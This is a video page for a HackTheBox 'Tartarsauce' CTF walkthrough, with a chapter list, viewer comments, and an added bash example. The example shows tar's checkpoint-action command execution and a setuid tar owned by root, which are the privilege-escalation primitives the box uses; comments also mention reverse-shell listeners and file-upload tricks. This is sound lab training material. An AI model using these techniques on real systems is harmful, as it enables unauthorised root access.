HackTheBox - Tartarsauce

30,046 views

IppSec

5 years ago

01:10 - Begin of recon
03:00 - Discovery of WordPress and fixing broken links with Burp
06:50 - Start of WPScan
07:14 - Start of poking at Monstra (rabbit hole)
13:05 - Back to looking at WPScan, find the Gwolle plugin is vulnerable to RFI exploits
16:30 - Reverse shell returned as www-data
18:08 - Confirming Monstra was read-only
18:50 - Running LinEnum.sh to see www-data can run tar via sudo
20:30 - Use GTFOBins to find a way to execute code with tar
22:00 - Begin of onuma user, use LinEnum again to see a systemd timer for a custom script
24:10 - Examining the backuperer script
26:00 - Hunting for vulnerabilities in backuperer
32:15 - Playing with if/then exit codes in Bash. Turns out exit(0/1) evaluate as true, 2 is false
34:20 - Begin of exploiting the backuperer service by exploiting the integrity check
36:40 - Creating our 32-bit setuid binary
39:16 - Replacing the backup tar with our malicious one (file owner of the shell is wrong)
40:54 - Explaining that file owners are embedded within tar; creating the tar on our local box so we can have the setuid file owned by root
42:30 - Exploiting the backuperer service via setuid!
45:00 - Unintended exploit: using symlinks to read files via the backuperer service
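Two tar behaviours the walkthrough leans on, at 18:50-20:30 (code execution through a sudo-able tar) and 39:16-42:30 (a setuid file that must come out of the archive owned by root), as an added example that is not part of the video or its description. It assumes GNU tar (`--checkpoint-action`, `--owner`, `--group` and `--mode` are GNU extensions); the `payload` script is a stand-in for the compiled 32-bit setuid binary, the temp paths are whatever mktemp hands back, and nothing here runs as root. The first function shows that tar's checkpoint action executes an arbitrary command in whatever context tar itself runs in; the second shows that owner, group and mode are stored inside the archive, so an unprivileged user can declare a root:root setuid member that a root-level extraction reproduces faithfully.

```shell
#!/usr/bin/env bash
# Added example, not code from the video. Requires GNU tar.
set -u

# 1. The GTFOBins primitive behind "www-data can run tar via sudo".
#    The archive operation itself is a no-op (/dev/null in, /dev/null out);
#    the work happens in the checkpoint action, which tar runs through
#    /bin/sh -c as the user tar is running as. Behind the sudo rule that
#    user would be the privileged one; here it is just the caller, so the
#    function only proves the action fires and returns what it printed.
tar_checkpoint_exec() {
    local cmd="$1"
    local out i
    out=$(mktemp)
    # --checkpoint=1 fires after the first record is written; exec= runs $cmd.
    tar -cf /dev/null /dev/null --checkpoint=1 \
        --checkpoint-action=exec="$cmd > $out" >/dev/null 2>&1
    # Give the forked action a moment in case tar returned before it finished.
    for i in 1 2 3 4 5; do
        [ -s "$out" ] && break
        sleep 0.2
    done
    cat "$out"
    rm -f "$out"
}

# 2. Ownership and permissions travel inside the tar header, not from the
#    filesystem of whoever extracts it. An archive built as a normal user can
#    therefore mark a member root:root with the setuid bit; when a root
#    process (the backuperer timer) extracts it, the file lands root-owned and
#    setuid. Building the archive on the attacker box as root, as done at
#    40:54, is just another way of getting these header fields set.
#    Nothing here needs root: we write the archive and read its headers back.
build_root_setuid_tar() {
    local archive="$1"
    local work
    work=$(mktemp -d)
    # Stand-in for the compiled setuid binary (constructed for this example).
    printf '#!/bin/sh\nid\n' > "$work/payload"
    chmod 755 "$work/payload"
    tar -C "$work" --owner=root --group=root --mode=4755 -cf "$archive" payload
    rm -rf "$work"
    # Echo the listing line, which shows the stored mode and owner, e.g.
    # "-rwsr-xr-x root/root 12 2024-01-01 00:00 payload"
    tar -tvf "$archive" payload
}
```

On the box itself the first function is what the sudo rule turns into a shell as the other user, and the second is why a tar created from inside the low-privilege shell (39:16) left the setuid file owned by the wrong user: tar had recorded that user as owner, and the extracting root process honoured it.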

Comments: 61
@SeattleGenXDude 4 years ago
The gobuster syntax has changed...gets me every time
@juancarlosmartinezhernande7777 6 months ago
Try feroxbuster, it is better.
@systemSHK 4 years ago
Thanks IppSec, great video. Fantastic box and I learned so much.
@davehouser1 3 years ago
Wow, 17:30 - 18:05. I never knew you could set stty (to get tab complete, also support watch) + set the terminal env var (to clear, backspace, and use up-arrow history commands). This is great. I have been using rlwrap for a while, which is a quick way to be able to do everything that your use of stty does, BUT I could never tab complete. This rules! BTW I tested to see if rlwrap would work with stty; it does not. Your tmux window will go on the fritz. You must perform a plain ol' nc -nlvp, without rlwrap, to utilize stty properly. Also note, if you do use stty with tmux, your pane size matters. Try not to adjust the size too much. Lastly, to actually exit the nc session with stty enabled I had to reset my tmux pane. Just some caveats I wanted to share. Thanks for sharing this! :D
@Seferan 4 years ago
If you're struggling to get WPScan to show the plugins, I believe it's due to WPScan changes here: blog.wpscan.org/wpscan/deprecation/2019/11/25/old-wpscan-deprecation.html. I updated my WPScan (gem install wpscan) to 3.7.7, signed up for an API key and ran the command: wpscan --url 10.10.10.88/webservices/wp -e p --api-token --plugins-detection aggressive . I'm not sure if the update was required (or maybe just the plugin-detection setting) but this worked for me.
@billy-cg1qq 5 years ago
I love this box and your content, continue :-)
@theedmbrewery6234 5 years ago
Doing this box right now. Very thankful to you.
@supersteve6772 1 year ago
Absolutely stellar explanation!
@mrblackhat616 5 years ago
Awesome video as always.
@robokopi00 5 years ago
Liked & subscribed. Great content 👌🏼
@haanrey 3 years ago
Does the OSCP exam have boxes like this? :O Like the priv esc part?!
@johntaylor1036 3 years ago
I too would like to know.
@TsukiCTF 5 years ago
One of my favorite boxes.
@theedmbrewery6234 5 years ago
At 13:23, you can see there is a readme file location just above the highlighted line, which says that the version was changed from 1.5.3 to 2.3.10 to trick WPScan, and that's what gives away the actual version of this plugin.
@RohanOnBike 5 years ago
I was waiting for this for a long time. Had user, but couldn't get root. Wasn't able to exploit it in that 30-second window.
@TheIronpusher 5 years ago
Ipp! Thank you for the videos, they are a great help and motivation while working on my OSCP. I have a question, as unfortunately I have no connections in the field. How different is your methodology and approach on an actual pen test?
@ippsec 5 years ago
They are pretty different. If you want to see what a traditional pentest is like, check out Rastalabs or Offshore. A lot less bug hunting and a lot more lateral movement and hunting for interesting things. The easiest way I can explain it is: imagine you're on a sports team. Your practice isn't just grinding out games. It's a bunch of small drills to focus on specific mechanics that help improve your overall skill. These machines are drills. Not direct 1:1, but when hiring I'd prefer a junior that does CTFs over a senior pentester that does not. Primarily because I enjoy working with people who enjoy solving puzzles and aren't in it for the money. Not saying people who don't do CTFs are in it for the money, just a probability thing.
@chenxiaogeng2283 5 years ago
Great video! I was stuck at the last part and tried to figure out what I could do with the diff command. Thank you IppSec.
@StrikerGoutham 5 years ago
Got the box by the unintended priv esc! Was waiting for the proper priv esc, now I can sleep in peace :p
@mrinaljaiswal3251 5 years ago
Hey ippsec, can you please do a video on the most common privesc methods and on using Burp Suite to do blind SQL injection (no automated scanner)?
@gw2955 3 years ago
This is nice, but for the OSCP can we use WPScan and priv esc? I know not everyone watching is doing the OSCP, but I just had that question.
@gracereigns 5 years ago
I've used tail to check logs, Burp to check HTTP headers, and the payload looks ok, but I keep on connecting to myself when I invoke "wp-load.php".
@gracereigns 5 years ago
I have updated my "wp-load.php" host and port accordingly but for some reason I keep on connecting to myself :(
@gracereigns 5 years ago
At 16:22, how did you partition your terminal into 3 segments? I use the terminal daily and I always wanted to do it that way.
@ippsec 5 years ago
Look at my tmux video.
@gracereigns 5 years ago
@ippsec thank you for the prompt reply.
@gracereigns 5 years ago
After debugging my script for a while, I noticed that the PHP got executed on my machine, which was using Python SimpleHTTP.
@skyone9237 5 years ago
Can someone suggest any videos or books to learn priv esc?
@beastface5123 5 years ago
www.trustwave.com/Resources/SpiderLabs-Blog/My-5-Top-Ways-to-Escalate-Privileges/
@divyarajsinhketansinhmahid65 2 years ago
The new WPScan does not scan for the plugins. Is it strange that after an update tools get worse?
@wenhui183 2 years ago
Change the scan mode: --plugins-detection aggressive or mixed.
@tan6347 2 years ago
Check the man page if you don’t know how to use the command.
@einfallstoll 5 years ago
I used a Path Traversal Vulnerability to upload a PHP Reverse Shell to the parent directory of Monstra using the file uploader. I didn't even look at the WordPress because I thought it was a rabbit hole ;)
@NomanRiffat 5 years ago
I would like to know how you did it. Since there wasn't any write permission for the apache user in the web root directory, how did you upload the file? The WP plugin RFI vulnerability also didn't upload the file itself but executed code remotely.
@marcogenovese532 5 years ago
@NomanRiffat Same, I also tried path traversal to wp-content (hoping it would be writable) but since there were no write permissions for www-data I couldn't do it.
@einfallstoll 5 years ago
There is a file uploader in Monstra. You could set the upload path in the GET parameter to the parent directory. To do this you had to bypass the insufficient security mechanism that should've prevented that. Here's my advisory on this: www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2018-027_monstra_cms.txt
@rtrvlogs582 4 years ago
I thought of doing that, but didn't know which dir to write to. After seeing your comment I dug in again; pretty nice way to get a shell 👍
@wutangdaug 4 years ago
Hi there. Can you tell me how you managed to use Google to find this particular vulnerability? I can't seem to find it. Trying to sharpen my google-fu as well, if you don't mind sharing!
@gracereigns 5 years ago
I will check my apache logs to see if the script gets executed on the victim machine :(
@NimbleSF 8 months ago
This box was literally hell I wanted to die the whole time I was doing it
@RashadPrince 5 years ago
Being all over the place is fine, right? I mean, that's how it is in the real world, correct?
@kristibegaj608 5 years ago
I'm a big fan, but the RFI was lame honestly!! Monstra has an LFI that is lit, and you just passed the git issues of the bug report and didn't see the most important one that lets you go back to a writeable dir to upload the file with a php7 extension.. that's how I did it!
@ippsec 5 years ago
Nice! Completely missed that, background recon finished too quickly and I stopped looking at it.
@kristibegaj608 5 years ago
@ippsec and I also missed the WordPress way because I found the Monstra way easier and faster, but it's still file inclusion either way 😅 Respect for you man, I really like the way you do things. 👏👏
@Tea20024 2 months ago
You copy the PleaseSubscribe file, make the tar.gz folder and copy it into the hash file which the script makes. But when the script performs an integrity check, won't that check fail? Since the victim machine's original /var/www/html folder won't have the PleaseSubscribe file? And when it fails, the script deletes the files it created in the /var/tmp folder.